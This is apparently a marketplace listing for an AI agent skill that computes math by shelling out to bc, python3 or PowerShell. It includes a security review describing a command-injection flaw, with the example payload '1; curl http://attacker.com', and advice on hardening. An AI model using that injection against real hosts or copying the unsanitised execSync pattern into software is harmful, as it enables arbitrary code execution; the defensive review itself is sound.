← Back to Skills Marketplace
johnnyhou327

Math Utils Native

by johnnyhou327 · GitHub ↗ · v1.0.1 · MIT-0
cross-platform ⚠ suspicious
418
Downloads
0
Stars
3
Active Installs
2
Versions
Install in OpenClaw
/install math-utils-native
Description
Performs precise math calculations by executing native OS CLI tools like bc, python3, or PowerShell without relying on AI prediction.
Usage Guidance
This skill evaluates math expressions by building shell/PowerShell commands from the input and running them with execSync. That means a malicious or malformed expression can inject arbitrary shell commands on the host (e.g., expressions containing ;, ``, $(), backticks, quotes, or other metacharacters). If you plan to install or run this skill, only do so on an isolated, non-production host or container. Prefer safer alternatives: use a dedicated math parser library (e.g., decimal.js, mathjs) or evaluate expressions in a sandboxed process; if you must keep the current approach, apply strict input validation/whitelisting (allow only digits, whitespace, parentheses, and a limited set of operators) and avoid passing user input into a shell string—use execFile/spawn with arguments or a library that evaluates expressions without invoking a shell. If you need help hardening this skill, ask for specific code changes (e.g., a sanitized evaluator or replacement with a trusted math library).
Capability Analysis
Type: OpenClaw Skill Name: math-utils-native Version: 1.0.1 The skill contains a critical command injection vulnerability in `main.js` where the `calculate` function directly interpolates user-provided input into shell commands via `execSync`. This allows for arbitrary code execution on the host system using `bc`, `python3`, or `PowerShell` (e.g., by passing an expression like `1; curl http://attacker.com`). While the behavior aligns with the stated purpose of a native math utility, the lack of any input sanitization makes it highly dangerous.
Capability Assessment
Purpose & Capability
Name/description match the implementation: it executes local CLI tools (bc, python3, PowerShell) to compute expressions. No unrelated credentials, binaries, or installs are requested.
Instruction Scope
SKILL.md explicitly instructs executing local CLI commands to evaluate expressions. The shipped main.js directly interpolates the supplied expression into shell commands (execSync with a single command string) without validation or sanitization, creating a command-injection risk. The instructions do not mention input validation, sandboxing, or safety constraints.
Install Mechanism
No install spec (instruction-only + small code file). Nothing is downloaded or installed by the skill, so there is no supply-chain install risk here.
Credentials
The skill requests no environment variables, credentials, or config paths — appropriate and minimal for the stated purpose.
Persistence & Privilege
always is false and the skill does not request any special persistent or cross-skill privileges. It runs on-demand and does not modify other skills or system-wide settings.
How to Use
  1. Make sure OpenClaw is installed (local or Docker)
  2. Run the install command in chat: /install math-utils-native
  3. After installation, invoke the skill by name or use /math-utils-native
  4. Provide required inputs per the skill's parameter spec and get structured output
Version History
v1.0.1
- No changes detected; this version is functionally identical to the previous release. - All descriptions, usage instructions, and implementation details remain unchanged.
v1.0.0
Initial release of math-utils-native: - Provides accurate mathematical computation by invoking the operating system’s native CLI calculator tools. - Supports Linux, macOS, and Windows by auto-detecting OS and choosing appropriate calculation backends (`bc`, `python3`, or PowerShell). - Exposes a `calculate(expression)` function for precise evaluation of math expressions. - Ensures all results are computed and validated at the system level, independent of language model prediction.
Metadata
Slug math-utils-native
Version 1.0.1
License MIT-0
All-time Installs 3
Active Installs 3
Total Versions 2
Frequently Asked Questions

What is Math Utils Native?

Performs precise math calculations by executing native OS CLI tools like bc, python3, or PowerShell without relying on AI prediction. It is an AI Agent Skill for Claude Code / OpenClaw, with 418 downloads so far.

How do I install Math Utils Native?

Run "/install math-utils-native" in the OpenClaw or Claude Code chat to install it in one step — no extra setup required.

Is Math Utils Native free?

Yes, Math Utils Native is completely free, licensed under MIT-0. You can download, install and use it at no cost.

Which platforms does Math Utils Native support?

Math Utils Native is cross-platform and runs anywhere OpenClaw / Claude Code is available (cross-platform).

Who created Math Utils Native?

It is built and maintained by johnnyhou327 (@johnnyhou327); the current version is v1.0.1.

More Skills
self-improving agent
Captures learnings, errors, and corrections to enable continuous improvement. Use when: (1) A command or operation fails unexpectedly, (2) User corrects Clau...
⬇ 463283 · by pskoett
Skill Vetter
Security-first skill vetting for AI agents. Use before installing any skill from ClawdHub, GitHub, or other sources. Checks for red flags, permission scope, and suspicious patterns.
⬇ 259410 · by spclaudehome
Polymarket
Query Polymarket prediction markets. Check odds, find trending markets, search events, track price movements.
⬇ 232503 · by joelchance
Self-Improving + Proactive Agent
Self-reflection + Self-criticism + Self-learning + Self-organizing memory. Agent evaluates its own work, catches mistakes, and improves permanently. Use when...
⬇ 200423 · by ivangdavila
Github
Interact with GitHub using the `gh` CLI. Use `gh issue`, `gh pr`, `gh run`, and `gh api` for issues, PRs, CI runs, and advanced queries.
⬇ 191115 · by steipete
ontology
Typed knowledge graph for structured agent memory and composable skills. Use when creating/querying entities (Person, Project, Task, Event, Document), linkin...
⬇ 190156 · by oswalpalash

💬 Comments